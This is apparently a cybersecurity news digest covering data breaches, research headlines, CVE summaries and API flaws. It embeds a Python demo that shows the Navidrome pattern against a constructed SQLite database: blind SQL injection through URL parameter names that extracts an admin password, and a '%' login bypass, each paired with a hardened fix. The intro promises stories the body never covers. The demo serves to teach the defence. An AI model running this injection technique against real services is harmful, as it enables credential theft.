Secret CISO 9/20: Equifax's Security Lessons, AT&T's $13M Fine, Disney Ditches Slack After Breach, UK, US, Canada Collaborate on Cybersecurity Research
Good morning, Secret CISO readers! Today's newsletter is packed with crucial updates from the world of cybersecurity. We're diving into the latest data breaches and revisiting the Equifax breach, in which Social Security numbers were stolen, for the lessons it still holds. We'll also discuss the ongoing lawsuit against an Illinois-based golf course company over a previous data breach. In the corporate world, AT&T has agreed to a $13M settlement over a data breach, while Disney has decided to stop using Slack by the end of the year after a massive data breach. We'll also touch on best practices for security in software development, as suggested by Forbes.
On the legal front, Federman & Sherwood are investigating multiple companies for data breaches, including TradeZero America Inc. and Insurance Agency Marketing Services, Inc. We'll also look into the recent data breach at Providence Public School District and the launch of an online portal for data breach reporting by Pennsylvania's Attorney General. In the research sector, we have updates on collaborations between the UK, US, and Canada on cybersecurity research, and the selection of 2024-2025 Minerva-USIP Peace and Security Fellows by the Department of Defense.
Finally, we'll wrap up with the latest cybersecurity vulnerabilities and how they're being addressed. Stay tuned for all this and more in today's edition of Secret CISO. Stay safe and informed!
Data Breaches
- Golf Course Co. Sued Again; Earlier Data Breach Case Axed: An Illinois-based golf course company is facing a new lawsuit over a data breach after an earlier case against it was dismissed. The details of the breach have not been disclosed. Source: Law360
- Federman & Sherwood Investigates TradeZero America Inc. for Data Breach: TradeZero America Inc. is under investigation after a data breach that compromised individuals' names, Social Security numbers, driver's license numbers and financial information. Source: Business Wire
- AT&T Settles $13M FCC Investigation Over Data Breach: AT&T has agreed to a $13M settlement with the FCC following a data breach that occurred at a vendor. Beyond the payment, the settlement requires AT&T to adopt new privacy and data security measures. Source: The National Law Review
- Providence school officials are quiet on data breach details: A ransomware group claims to have stolen 200 gigabytes of data from the Providence Public School District, but officials have yet to provide details on the breach. Source: Rhode Island Current
- Disney ditches Slack after data breach, putting pressure on Salesforce to boost security: Disney has decided to stop using Slack following a data breach that exposed over 44 million messages, 18,800 spreadsheets and 13,000 PDF files. The move puts pressure on Salesforce, Slack's owner, to strengthen the platform's security. Source: eMarketer
Security Research
- Snowflake Hacker Still Active, Finding New Victims, Expert Says: The attacker known as the Snowflake hacker continues to find new victims despite the wide publicity around the campaign, and has even boasted about the intrusions to journalists and security researchers. Source: Yahoo Finance
- Local security expert pens online safety guide with daughter to help parents: A security expert and his teenage daughter have written a guide on online safety and security, aiming to help parents navigate the digital world with their children. Source: NEWS10 ABC
- macOS Sequoia's firewall disrupts security tools, and more: Firewall changes in macOS Sequoia are breaking third-party security tools. Security researcher Will Dormann reported running into problems with the new release. Source: MacDailyNews
- UK, US and Canada to collaborate on cybersecurity research: The UK, US, and Canada are joining forces to enhance cybersecurity research in support of defense and security. The collaboration aims to strengthen the cybersecurity capabilities of the three nations. Source: Innovation News Network
- Researcher reveals 'catastrophic' security flaw in the Arc browser: A security researcher has uncovered a severe vulnerability in the Arc browser. The flaw, described as "catastrophic," could have allowed attackers to inject arbitrary code into a victim's browser. Source: The Verge
Top CVEs
- CVE-2024-45793 - Confidant Cross Site Scripting Vulnerability: Confidant, an open-source secret management service, has a cross-site scripting vulnerability in several of its endpoints. An attacker must be authenticated and hold privileges to create new credentials; with those, they can inject content and scripts that render and execute for other users of the same Confidant instance. The issue is patched in version 6.6.2 and all users are advised to upgrade. Source: CVE-2024-45793
- CVE-2024-47062 - Navidrome SQL Injection Vulnerability: Navidrome, an open-source web-based music collection server and streamer, has SQL injection vulnerabilities. Query parameters appended to the URL are passed into SQL queries, so an attacker can retrieve arbitrary information and dump database contents. The vulnerabilities are fixed in release 0.53.0 and users are advised to upgrade. Source: CVE-2024-47062
- CVE-2024-45489 - Arc Remote Code Execution Vulnerability: The Arc web browser has a vulnerability that allows remote code execution through JavaScript "boosts". Because of misconfigured Firebase ACLs, it was possible to create or update a boost using another user's ID; the boost is then installed in the victim's browser and runs arbitrary JavaScript there in a privileged context. Source: CVE-2024-45489
- CVE-2024-41721 - USB Code Insufficient Boundary Validation: Insufficient boundary validation in the USB (XHCI) device emulation of FreeBSD's bhyve hypervisor can lead to an out-of-bounds heap read, which could in turn be turned into an arbitrary write and remote code execution. Source: CVE-2024-41721
- CVE-2018-20319 - Reserved for Future Use: This identifier is still in the reserved state: it has been assigned to an organization or individual for a security problem that has not yet been announced, so no details are public and there is nothing to act on yet. Source: CVE-2018-20319
API Security
- Versa Director API Vulnerability (CVE-2024-45229): Versa Director's REST APIs, which provide orchestration and management, can be abused through an injection in a GET request to expose the authentication tokens of currently logged-in users. Those tokens can then be used to invoke additional APIs on port 9183. No workaround is available within Versa Director itself, but a Web Application Firewall (WAF) or API gateway can block access to the vulnerable API URLs until the fix is applied. Versa recommends upgrading to a remediated software version. Source: CVE-2024-45229
- Confidant API XSS Vulnerability: Several of Confidant's API calls are vulnerable to cross-site scripting (XSS). The attacker must be authenticated and have privileges to create new credentials, and can then inject content and scripts that render and execute for other users of the same Confidant instance. The issue is patched in version 6.6.2; no workarounds are available. Source: GHSA-RXQ8-Q85F-M866
- Navidrome SQL Injections and ORM Leak: Navidrome has multiple related vulnerabilities. In the ORM leak, parameters added to the URL are automatically turned into filter conditions in SQL queries, letting an attacker query information they should not be able to reach. Because the parameter names are not properly escaped before being placed in the query, the same mechanism also allows SQL injection. A separate weakness in authentication lets a user log in with "%" in place of their username. Source: GHSA-58VJ-CV5W-V4V6
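The two Navidrome entries above (CVE-2024-47062 under Top CVEs and GHSA-58VJ-CV5W-V4V6 here) describe one pattern: URL query parameters that flow straight into SQL. The following is an added example, not Navidrome's code, that reproduces the pattern against a constructed in-memory SQLite schema so the three effects can be seen side by side: a client filtering on a column it was never meant to see (the ORM leak), blind extraction of a password through an unescaped parameter name (the SQL injection), and a login lookup that accepts "%" as a username. The `song` and `user` tables, the `ALLOWED_FILTERS` set and the use of LIKE in the vulnerable login lookup are assumptions for illustration; the advisory does not say how Navidrome's own login query was written.

```python
"""Added example (not Navidrome's code): how URL query parameters spliced
straight into SQL produce an 'ORM leak' and parameter-name SQL injection,
and how a wildcard-capable login lookup accepts '%' as a username.
Schema, sample rows, endpoint shape and the ALLOWED_FILTERS set are all
constructed for illustration."""
import sqlite3
from urllib.parse import parse_qsl, urlencode

# Assumption: the only columns a client is meant to filter the song list on.
ALLOWED_FILTERS = {"title", "artist"}


def make_db():
    """Constructed in-memory schema standing in for a music server's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE song (id INTEGER, title TEXT, artist TEXT)")
    db.execute("CREATE TABLE user (id INTEGER, user_name TEXT, password TEXT)")
    db.executemany("INSERT INTO song VALUES (?, ?, ?)",
                   [(1, "Intro", "Band A"), (2, "Outro", "Band B")])
    db.executemany("INSERT INTO user VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return db


def list_songs_vulnerable(db, query_string):
    """Every URL parameter becomes a '<name> = ?' condition.  The value is bound
    safely, but the NAME is spliced into the SQL text unchecked, so the client
    controls both which column is filtered (ORM leak) and the SQL itself."""
    params = parse_qsl(query_string, keep_blank_values=True)
    clauses = [f"{name} = ?" for name, _ in params] or ["1 = 1"]
    sql = "SELECT id, title FROM song WHERE " + " AND ".join(clauses)
    return db.execute(sql, [value for _, value in params]).fetchall()


def list_songs_hardened(db, query_string):
    """Same endpoint with the fix: parameter names are matched against a fixed
    allowlist of identifiers before they can appear in the query text."""
    params = parse_qsl(query_string, keep_blank_values=True)
    clauses, values = [], []
    for name, value in params:
        if name not in ALLOWED_FILTERS:
            raise ValueError(f"unsupported filter: {name!r}")
        clauses.append(f"{name} = ?")  # name is now one of our own identifiers
        values.append(value)
    sql = "SELECT id, title FROM song WHERE " + (" AND ".join(clauses) or "1 = 1")
    return db.execute(sql, values).fetchall()


def filter_rejected(db, query_string):
    """True if the hardened endpoint refuses the query string."""
    try:
        list_songs_hardened(db, query_string)
        return False
    except ValueError:
        return True


def leak_admin_password(db, list_fn, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Boolean-based blind extraction through the parameter NAME.  The injected
    name ends in a subquery expression, so the endpoint's own ' = ?' completes it
    and the single bound value is the guessed prefix.  A non-empty result means
    the prefix is right; a full alphabet sweep with no hit means we are done."""
    known = ""
    while True:
        for ch in alphabet:
            guess = known + ch
            name = ("id = 1 AND substr((SELECT password FROM user "
                    f"WHERE user_name = 'admin'), 1, {len(guess)})")
            if list_fn(db, urlencode({name: guess})):
                known = guess
                break
        else:
            return known


def find_user_vulnerable(db, user_name):
    """Login lookup with a pattern match (assumed, for illustration): LIKE treats
    '%' and '_' as wildcards, so user_name='%' matches the first user in the table."""
    row = db.execute("SELECT user_name FROM user WHERE user_name LIKE ?",
                     (user_name,)).fetchone()
    return row[0] if row else None


def find_user_hardened(db, user_name):
    """Exact comparison: '%' is just a literal string that matches nobody."""
    row = db.execute("SELECT user_name FROM user WHERE user_name = ?",
                     (user_name,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("benign filter:", list_songs_vulnerable(db, "title=Intro"))
    print("leaked admin password:", leak_admin_password(db, list_songs_vulnerable))
    print("hardened rejects password filter:", filter_rejected(db, "password=x"))
    print("LIKE login with '%':", find_user_vulnerable(db, "%"))
    print("= login with '%':", find_user_hardened(db, "%"))
```

The binding of values with `?` is not the problem here and never was; the defect is that identifiers (column names) arrive from the client, and parameterised queries cannot bind identifiers. The only robust fix is the one in `list_songs_hardened`: map client-supplied names onto a closed set of server-owned identifiers, and reject everything else. Running `leak_admin_password` against `list_songs_hardened` stops at the first request with a `ValueError`.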
Sponsored by Wallarm API Security Solution
Final Words
And that's a wrap for today's edition of Secret CISO. We hope these insights help you stay ahead of the curve in the ever-evolving landscape of data breaches and security threats. Remember, the first step to protection is awareness.
So, keep yourself informed and don't forget to share this newsletter with your friends and colleagues.
Let's work together to create a safer digital world. Stay safe and see you tomorrow!